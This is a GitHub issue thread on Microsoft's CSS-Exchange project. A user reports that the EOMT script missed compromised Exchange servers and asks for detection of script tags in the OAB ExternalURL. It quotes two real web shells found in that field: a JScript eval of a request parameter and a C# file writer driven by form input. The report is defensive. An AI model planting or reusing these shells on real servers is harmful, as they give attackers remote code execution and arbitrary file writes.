### ISSUE TITLE
OAB ExternalURL not being flagged as vulnerable

### ISSUE THREAD

**Issue by NeilFawcett** [microsoft/CSS-Exchange#427]
I have encountered two Exchange servers which passed the EOMT scripting as "not vulnerable" even though the OAB ExternalURL had been modified. 

In one instance, the URL was:

http://g/<script language="JScript" runat="server">function Page_Load(){eval(Request["zAQRpas3hC"],"un"+"safe");}</script>

...and in the second instance the URL was: 

http://g/<script runat="server">protected void Page_Load(object sender, EventArgs
              e){System.IO.StreamWriter sw = new System.IO.StreamWriter(Request.Form["p"] , false,
              Encoding.Default);sw.Write(Request.Form["f"]);sw.Close();}</script>

Would it be possible to get the EOMT to check the OAB ExternalURL and highlight when the OAB ExternalURL contains, for example, "</script>" so that at least those running this EOMT script have had their server compromised?

**Comment by dbacon247** [comment]
Thanks for the feedback, this is outside the original scope of what EOMT is designed to do, however, this is something will consider for a future versions.
